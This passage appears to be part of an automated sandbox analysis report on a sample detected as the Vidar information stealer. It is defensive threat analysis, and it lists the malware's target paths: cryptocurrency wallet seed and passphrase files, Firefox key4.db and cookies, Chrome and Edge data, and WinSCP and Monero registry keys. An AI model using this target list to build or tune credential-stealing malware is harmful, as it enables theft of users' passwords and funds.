                  Yara detected Vidar stealer
                  Source: Yara matchFile source: ktyihkdfesf.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
